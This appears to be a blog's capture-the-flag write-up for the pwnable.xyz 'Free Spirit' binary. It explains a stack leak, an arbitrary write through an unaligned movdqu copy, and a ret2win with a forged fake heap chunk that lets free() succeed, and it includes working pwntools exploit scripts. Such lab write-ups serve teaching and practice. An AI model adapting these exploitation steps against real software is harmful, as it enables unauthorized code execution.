Unicorn's Blog

pwnable.xyz Free Spirit

26 Feb 2025

Problem

Free is misbehaving.

  • challenge: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=f9c9a081578630d7b736a704a82a275c363b22d9, not stripped

Recon

The main() function in pseudo c, 1 can read 32 bytes on to the heap buffer, 2 can leak stack address, and 3 can move the value in heap buffer to somewhere.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
// main
void* chunk_addr = malloc(0x40);
while (true) {
    __printf_chk(1, "> ");
    char* buf;
    __builtin_memset(&buf, 0, 0x30);
    read(0, &buf, 0x30);
    int32_t input = atoi(&buf);
    if (input == 1)
        syscall(0, 0, chunk_addr, 0x20); // read(0, chunk_addr, 0x20);
    else {
        if (input == 2) {
            __printf_chk(1, "%p\n", &chunk_addr);
            continue;
        } else if (input == 3) {
            if (limit > 1) continue;
            else {
                int64_t var_60;
                var_60 = *(uint128_t*)chunk_addr;
                continue;
            }
        }
        if (!input) {
            // check stack 
            free(chunk_addr);
        }
        puts("Invalid");
    }
}

Exploit

Arbitrary Write

Take a closer look at line 19 in assembly, the instruction movdqu will move unaligned double quadword, which is 128 bits (16 bytes), from heap buffer to rsp+0x8. Notice that chunk_addr (rsp+0x10) will also be overwrite by 0x0040088d, since we control the heap buffer data through option 1, this create a arbitrary write. The following payload is able to write to any address repeatedly.

00400884  488b442410         mov     rax, qword [rsp+0x10 {chunk_addr}]
00400889  f30f6f00           movdqu  xmm0, xmmword [rax]
0040088d  f30f7f442408       movdqu  xmmword [rsp+0x8 {var_60}], xmm0
1
<4 bytes to write to chunk_addr><next address to write>
3

Ret2win

Since we can control any address, we can set the return address of main() to win() (0x400a3e) with the script

# pwn template --host svc.pwnable.xyz --port 30005 ./challenge
io = start()

io.sendafter(b"> ", b"2")
chunk_addr = int(io.recvline().strip().decode(), 16)
log.info(f"{chunk_addr = :x}")
ret_addr = chunk_addr + 0x58

io.sendafter(b"> ", b"1")
io.send(b"a" * 8 + p64(ret_addr))
io.sendafter(b"> ", b"3")
io.sendafter(b"> ", b"1")
io.send(p64(0x400a3e))

Free

However the free() on line 25 will cause error, hence won’t return from main() and no flag for us. In order to free() successfully, we need to create a fake chunk, the address of the fake chunk doesn’t necessary needs to be in the heap, as long as address & 8 == 0 will be fine, I choose to use an empty memory 0x601100 to create the fake chunk with following structure

  +0x0 +0x8
0x6010f0 empty size = 0x50
0x601100 empty empty

Combine with the previous scripts

io = start()

io.sendafter(b"> ", b"2")
chunk_addr = int(io.recvline().strip().decode(), 16)
log.info(f"{chunk_addr = :x}")
ret_addr = chunk_addr + 0x58
log.info(f"{ret_addr = :x}")
fake_chunk_addr = 0x601100
log.info(f"{fake_chunk_addr = :x}")
fake_chunk_size = fake_chunk_addr - 0x8
log.info(f"{fake_chunk_size = :x}")

io.sendafter(b"> ", b"1")
io.send(b"a" * 8 + p64(ret_addr))
io.sendafter(b"> ", b"3")
io.sendafter(b"> ", b"1")
io.send(p64(0x400a3e) + p64(fake_chunk_size))
io.sendafter(b"> ", b"3")
io.sendafter(b"> ", b"1")
io.send(p64(0x50) + p64(fake_chunk_addr))
io.sendafter(b"> ", b"3")

io.sendafter(b"> ", b"0")

io.interactive()